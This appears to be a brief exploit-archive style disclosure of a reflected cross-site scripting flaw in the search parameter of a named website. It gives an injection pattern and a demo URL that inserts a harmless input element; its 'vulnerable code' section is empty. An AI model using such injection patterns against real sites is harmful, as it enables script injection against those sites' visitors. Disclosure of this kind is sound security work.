*************************************************** Abzarak XSS Vulnerability *************************************************** Author:Mohammad Javanbakht Email:secanar[at]gmail.com blog:secanar.blogspot.com *************************************************** Exploit: [site]/?s= [html code]->(Decode ACSII to Hex) Vulnerable code:
*************************************************** *************************************************** Demo: http://www.abzarak.com/?s=%3Cinput+value%3D%22XSS%22%3E%3C%2Finput%3E *************************************************** END